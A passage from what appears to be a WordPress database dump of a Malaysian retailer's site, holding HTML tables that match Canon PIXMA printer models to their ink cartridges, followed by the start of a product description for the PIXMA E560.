(Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP520</td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP530</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP568</td>\r\n<td width=\"208\">CLI-821 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-820 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP600</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP610</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP628</td>\r\n<td width=\"208\">CLI-821 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-820 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP638</td>\r\n<td width=\"208\">CLI-821 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-820 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP648</td>\r\n<td width=\"208\">CLI-821 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-820 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP800</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP800R</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP810</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP830</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP970</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Photo Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Photo Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP988</td>\r\n<td width=\"208\">CLI-821 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-820 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP996</td>\r\n<td width=\"208\">CLI-821 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-820 (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX308</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-831 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-830 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX328</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX338</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX347</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX366</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX426</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX876</td>\r\n<td width=\"208\">CLI-821 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-821 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-820 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MX886</td>\r\n<td width=\"208\">CLI-726 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-726 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-726 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-726 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-725 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA PRO-1</td>\r\n<td width=\"208\">PGI-29 (Chroma Optimizer)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Dark Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Light Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Matte Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Photo Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Photo Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Photo Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Red)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-29 (Yellow)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA PRO-10</td>\r\n<td width=\"208\">PGI-72 (Chroma Optimizer)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Matte Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Photo Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Photo Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Photo Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Red)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-72 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA PRO-100</td>\r\n<td width=\"208\">CLI-42 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-42 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-42 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-42 (Light Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-42 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-42 (Photo Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-42 (Photo Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-42 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TR8570</td>\r\n<td width=\"208\">CLI-781 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TS207</td>\r\n<td width=\"208\">CL-746 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745S (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TS307</td>\r\n<td width=\"208\">CL-746 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745S (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TS5070</td>\r\n<td width=\"208\">CLI-771 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-771 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-771 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-771 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-771XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-771XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-771XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-771XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-770 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-770XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TS5170</td>\r\n<td width=\"208\">CL-741 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-741XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740/CL-741 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740XL (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TS8270</td>\r\n<td width=\"208\">CLI-781 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Photo Blue)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Photo Blue)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TS9170</td>\r\n<td width=\"208\">CLI-781 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Photo Blue)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Photo Blue)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA TS9570</td>\r\n<td width=\"208\">CLI-781 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-781XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-780XL (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-01-03 15:19:59','2019-01-03 07:19:59','',1449,'https://bintara.com.my/blog/2019/01/03/1449-revision-v1/',0,'revision','',0),(2736,1,'2018-12-24 10:03:07','2018-12-24 02:03:07','<h3>Injet Printers :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 